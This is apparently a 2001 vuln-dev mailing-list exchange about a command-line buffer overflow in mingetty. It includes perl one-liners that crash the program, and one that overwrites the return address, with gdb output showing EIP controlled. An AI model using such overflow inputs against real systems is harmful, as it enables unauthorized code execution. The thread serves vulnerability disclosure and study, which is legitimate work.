On Mon, Dec 03, 2001 at 05:43:22PM -0200, Nelson Sampaio Araujo Junior wrote:
> I've detected it under Mandrake 8.1.
>
> Thus, this attack was not able to currupt EIP register, what is a good
> signal. It screws up EAX and EDX registers.
Not true.
/sbin/mingetty `perl -e 'print "A" x 255, "\x94\x1c\x49\x80"'`
#0 0x80491c94 in ?? ()
(gdb) info registers eip
eip: 0x80491c94 -2142692204
>
> Regards,
> Nelson Junior
> nelson_at_lunenetworks.com.br
> nelson_at_LUNE.com.br
>
> ----- Original Message -----
> From: "Ryan Yagatich" <ryany_at_procyon.pantek.com>
> Cc: <vuln-dev_at_security-focus.com>
> Sent: Monday, December 03, 2001 5:21 PM
> Subject: Re: core dump on mingetty and getty
>
>
> > $ cd ~
> > $ /sbin/mingetty `perl -e 'print "A" x 275'`
> > $ /sbin/mingetty `perl -e 'print "A" x 276'`
> > Segmentation fault
> > $ uname -a
> > Linux frodo.devel.lab 2.4.7-10 #1 ...
> >
> >
> >
Received on Dec 04 2001
Intro
